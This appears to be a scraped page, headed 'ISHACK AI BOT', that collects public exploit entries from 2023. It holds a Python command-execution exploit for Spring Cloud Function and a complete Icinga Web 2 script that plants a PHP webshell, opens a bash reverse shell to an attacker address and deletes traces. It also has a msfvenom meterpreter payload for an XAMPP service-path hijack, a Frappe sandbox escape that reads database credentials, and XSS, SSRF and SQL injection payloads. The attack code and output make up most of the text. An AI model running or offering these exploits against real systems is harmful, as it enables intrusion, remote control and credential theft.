ISHACK AI BOT

# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE) # Date: 07/07/2023 # Exploit Author: GatoGamer1155, 0bfxgh0st # Vendor Homepage: https://spring.io/projects/spring-cloud-function/ # Description: Exploit to execute commands exploiting CVE-2022-22963 # Software Link: https://spring.io/projects/spring-cloud-function # CVE: CVE-2022-22963 import requests, argparse, json parser = argparse.ArgumentParser() parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True) parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True) args = parser.parse_args() print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n") headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command } data = {"data": ""} request = requests.post(args.url, data=data, headers=headers) response = json.dumps(json.loads(request.text), indent=2) print(response)

# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: https://www.minitool.com/ # Software Link: https://www.minitool.com/download-center/ # Version: 12.7 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36164 # PoC C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto C:\Users>sc qc MTAgentService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MTAgentService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTAgentService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>systeminfo Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation

# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: https://www.minitool.com/ # Software Link: https://www.minitool.com/download-center/ # Version: 12.7 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36165 #PoC C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto C:\Users>sc qc MTSchedulerService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MTSchedulerService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTSchedulerService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>systeminfo Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation

# Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) # Exploit Author: Sander Ferdinand # Date: 2023-06-07 # Version: 13.4.0 # Vendor Homepage: http://erpnext.org # Software Link: https://github.com/frappe/frappe/ # Tested on: Ubuntu 22.04 # CVE : none Silly sandbox escape. > Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts. Requirements: - 'System Manager' role (which is not necessarily the admin) - Server config `server_script_enabled` set to `true` (likely) Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute payload. ```python3 hax = "echo pwned > /tmp/pwned" g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,)) for x in g:0 ``` Context: - https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/ - https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6 - https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script - https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42 Bonus: More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`: ```python3 hax = """ {g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf} """.strip() g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,)) for x in g:0 ``` Which prints the Frappe config like database/redis credentials, etc. In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.

# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: https://www.avg.com # Software Link: https://www.avg.com/en-ww/homepage#pc # Version: 7.5 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36167 #PoC C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto C:\Users>sc qc "AVG Anti-Spyware Guard" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: AVG Anti-Spyware Guard TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AVG Anti-Spyware Guard DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>systeminfo Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation

# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: None # Version: 5 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36163 #PoC: An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like: '><script>prompt("XSS");</script><div id="aa After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser. #Payload: company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa

#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration #Exploit Author: LiquidWorm Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.9.12.4 3.9.11.0 3.9.9.2 3.9.8.0 Summary: TITAN File is a multi-codec/format video transcoding software, for mezzanine, STB and ABR VOD, PostProduction, Playout and Archive applications. TITAN File is based on ATEME 5th Generation STREAM compression engine and delivers the highest video quality at minimum bitrates with accelerated parallel processing. Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video transcoding software. The application parses user supplied data in the job callback url GET parameter. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an external attacker for example to bypass firewalls and initiate a service, file and network enumeration on the internal network through the affected application. Tested on: Microsoft Windows NodeJS Ateme KFE Software Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5781 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php 22.04.2023 -- curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \ -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \ -H "User-Agent: sunee-mode" \ "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>" Call to file://C:\\windows\\system.ini returned 0 --- HTTP from Server ---------------- POST / HTTP/1.1 Host: ssrftest.zeroscience.mk Accept: */* Content-Type: application/xml Content-Length: 192 <?xml version='1.0' encoding='UTF-8' ?> <update> <id>0000</id> <name>dummy test job</name> <status>aborted</status> <progress>50</progress> <message>message</message> </update>

# Exploit Title: Game Jackal Server v5 - Unquoted Service Path # Date: 06/07/2023 # Exploit Author: Idan Malihi # Vendor Homepage: https://www.allradiosoft.ru # Software Link: https://www.allradiosoft.ru/en/ss/index.htm # Version: 5 # Tested on: Microsoft Windows 10 Pro # CVE : CVE-2023-36166 #PoC C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Game Jackal Server v5 GJServiceV5 C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe Auto C:\Users>sc qc GJServiceV5 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GJServiceV5 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Game Jackal Server v5 DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users>systeminfo Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation

#!/usr/bin/env python3 # Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution # Date: 8/07/2023 # Exploit Author: Dante Corona(Aka. cxdxnt) # Software Link: https://github.com/Icinga/icingaweb2 # Vendor Homepage: https://icinga.com/ # Software Link: https://github.com/Icinga/icingaweb2 # Version: <2.8.6, <2.9.6, <2.10 # Tested on: Icinga Web 2 Version 2.9.2 on Linux # CVE: CVE-2022-24715 # Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715 import requests,argparse,re,random,string from colorama import Fore,Style def letter_random(): letras = string.ascii_lowercase character_random = random.choices(letras, k=6) return ''.join(character_random) def users_url_password(): parser = argparse.ArgumentParser(description='Descripción de tu programa.') parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima') parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user') parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password') parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP') parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT') args = parser.parse_args() url = args.url user = args.user password=args.password ip_attack = args.ip port_attack = args.port return url,user,password,ip_attack,port_attack def login(url,user,password): try: login_url = url + "/icingaweb2/authentication/login" session = requests.Session() r = session.get(login_url) csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0] data_post = {"username":user, "password":password, "CSRFToken":csrf_regex, "formUID":"form_login", "btn_submit":"Login" } response = session.post(login_url,data=data_post) if "Welcome to Icinga Web!" in response.text: print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.") r = session.get(login_url) else: print("[!]Failed to login.") exit(1) #return session,csrf_regex except requests.exceptions.InvalidURL: print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(") exit(1) return session,csrf_regex def upload_file(session,url,character_random,csrf_regex): webshell = f"""-----BEGIN RSA PRIVATE KEY----- MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7 9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs /5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00 -----END RSA PRIVATE KEY----- <?php system($_REQUEST["%s"]);?> """%character_random upload_url = url + "/icingaweb2/config/createresource" r = session.get(upload_url) csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0] data_post ={"type":"ssh", "name":"shm/"+character_random, "user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php", "private_key":webshell, "formUID":"form_config_resource", "CSRFToken":csrf, "btn_submit":"Save Changes" } upload_response = session.post(upload_url,data=data_post) check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php") if check.status_code != 200 : print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(") exit(1) else: print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.") def enable_module(session,url,character_random): url_module = url+"/icingaweb2/config/general" r_module = session.get(url_module) csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0] data_post = {"global_show_stacktraces":"0", "global_show_stacktraces":"1", "global_show_application_state_messages":"0", "global_show_application_state_messages":"1", "global_module_path":"/dev/shm/", "global_config_resource":"icingaweb2", "logging_log":"none", "themes_default":"Icinga", "themes_disabled":"0", "authentication_default_domain":"", "formUID":"form_config_general", "CSRFToken":f"{csrf_module}", "btn_submit":"Save Changes" } resul = session.post(url_module,data_post) #-------------------------------------------------- url_enable = url +"/icingaweb2/config/moduleenable" r_enable = session.get(url_enable) csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0] data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"} resul_enable = session.post(url_enable,data_enable) def reverse_shell(session,url,ip_attack,port_attack,character_random): reverse_url = url + "/icingaweb2/dashboard" reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}' reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &" reverse_response_one = session.get(reverse_exe_one) try: reverse_response_two = session.get(reverse_exe_two, timeout=5) except: print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence") remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}") disable_url = url + "/icingaweb2/config/moduledisable" r_disable = session.get(disable_url) csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0] data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"} response_disable = session.post(disable_url,data=data_disable) def disable_module(session,url,character_random): url_disable = url + "/icingaweb2/config/moduledisable" if __name__ == '__main__': character_random = letter_random() url,user,password,ip_attack,port_attack = users_url_password() session,csrf_regex = login(url,user,password) upload_file(session,url,character_random,csrf_regex) enable_module(session,url,character_random) reverse_shell(session,url,ip_attack,port_attack,character_random)

# Exploit Title: XAMPP 8.2.4 - Unquoted Path # Date: 07/2023 # Exploit Author: Andrey Stoykov # Version: 8.2.4 # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe # Tested on: Windows Server 2022 # Blog: http://msecureltd.blogspot.com/ Steps to Exploit: 1. Search for unquoted paths 2. Generate meterpreter shell 3. Copy shell to XAMPP directory replacing "mysql.exe" 4. Exploit by double clicking on shell C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto // Generate shell msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe // Setup listener msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set lhost 192.168.1.13 msf6 exploit(multi/handler) > set lport 4443 msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp msf6 exploit(multi/handler) > run msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.1.13:4443 [*] Sending stage (175686 bytes) to 192.168.1.11 [*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700 meterpreter > getuid Server username: WIN-5PT4K404NLO\astoykov meterpreter > getpid Current pid: 4724 meterpreter > shell Process 5884 created. Channel 1 created. Microsoft Windows [Version 10.0.20348.1] (c) Microsoft Corporation. All rights reserved. [...] C:\xampp\mysql\bin>dir dir Volume in drive C has no label. Volume Serial Number is 80B5-B405 Directory of C:\xampp\mysql\bin [...]

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized) # Date: 09/07/2023 # Exploit Author: Hubert Wojciechowski # Contact Author: [email protected] # Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643 # Version: 4.0 # We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example 1 ----------------------------------------------------------------------------------------------------------------------- Param: name, email, comment ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /newsportal/news-details.php?nid=13 HTTP/1.1 Origin: http://127.0.0.1 Sec-Fetch-User: ?1 Host: 127.0.0.1:80 Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin sec-ch-ua-mobile: ?0 Content-Length: 277 Sec-Fetch-Mode: navigate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Connection: close Referer: http://127.0.0.1/newsportal/news-details.php?nid=13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-ch-ua-platform: "Windows" Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Fetch-Dest: document csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 10:55:26 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 146161 <script>alert('comment successfully submit. Comment will be display after admin review ');</script> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content=""> <meta name="author" content=""> <title>News Portal | Home Page [...] ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /newsportal/news-details.php?nid=13 HTTP/1.1 Origin: http://127.0.0.1 Sec-Fetch-User: ?1 Host: 127.0.0.1:80 Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin sec-ch-ua-mobile: ?0 Content-Length: 276 Sec-Fetch-Mode: navigate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Connection: close Referer: http://127.0.0.1/newsportal/news-details.php?nid=13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-ch-ua-platform: "Windows" Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Fetch-Dest: document csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 10:56:06 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 525 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '[email protected]','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21 Stack trace: #0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...') #1 {main} thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w ----------------------------------------------------------------------------------------------------------------------- SQLMap example param 'comment': ----------------------------------------------------------------------------------------------------------------------- sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests: --- Parameter: #2* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&[email protected]&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit= Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&[email protected]&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&[email protected]&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit= --- web application technology: PHP 8.1.17, Apache 2.4.56 bacck-end DBMS: MySQL >= 5.0 (MariaDB fork) ## Example 2 - login to administration panel ----------------------------------------------------------------------------------------------------------------------- Param: username ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /newsportal/admin/ HTTP/1.1 Host: 127.0.0.1 Content-Length: 42 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/newsportal/admin/ Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8 Connection: close username=admin'&password=Test%40123&login= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 11:00:53 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 505 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13 Stack trace: #0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...') #1 {main} thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br /> ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /newsportal/admin/ HTTP/1.1 Host: 127.0.0.1 Content-Length: 43 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/newsportal/admin/ Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8 Connection: close username=admin''&password=Test%40123&login= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 11:02:15 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 4733 Connection: close Content-Type: text/html; charset=UTF-8 <script>alert('Invalid Details');</script> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta 